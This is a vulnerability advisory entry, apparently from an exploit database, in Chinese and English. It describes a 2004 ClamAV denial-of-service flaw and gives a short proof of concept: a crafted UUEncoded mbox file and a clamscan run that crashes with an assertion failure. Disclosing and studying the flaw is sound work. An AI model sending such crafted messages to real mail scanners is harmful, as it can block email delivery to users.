https://www.exploit-db.com/exploits/23667
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-084

ClamAntivirus(clamav)是一款基于UNIX的病毒扫描程序。clamav在过滤畸形UUEncoded消息时存在问题，远程攻击者可以利用这个漏洞对病毒扫描模块进行拒绝服务攻击。如果消息中包含一行uuencoded编码的消息及一个非法行长度(如由一个小写字母开头)，当clamd解析时会使程序崩溃而退出。

source: http://www.securityfocus.com/bid/9610/info

A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users.

Save the following file to ~/clamtest.mbox:

From -

begin 644 byebye
byebye
end

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)

来源:BID
名称:9610
链接:http://www.securityfocus.com/bid/9610
来源:BUGTRAQ
名称:20040209clamav0.65remoteDOSexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107634700823822&w;=2
来源:XF
名称:clam-antivirus-uuencoded-dos(15077)
链接:http://xforce.iss.net/xforce/xfdb/15077
来源:www.freebsd.org
链接:http://www.freebsd.org/cgi/query-pr.cgi?pr=62586
来源:GENTOO
名称:GLSA-200402-07
链接:http://security.gentoo.org/glsa/glsa-200402-07.xml
来源:OSVDB
名称:3894
链接:http://www.osvdb.org/3894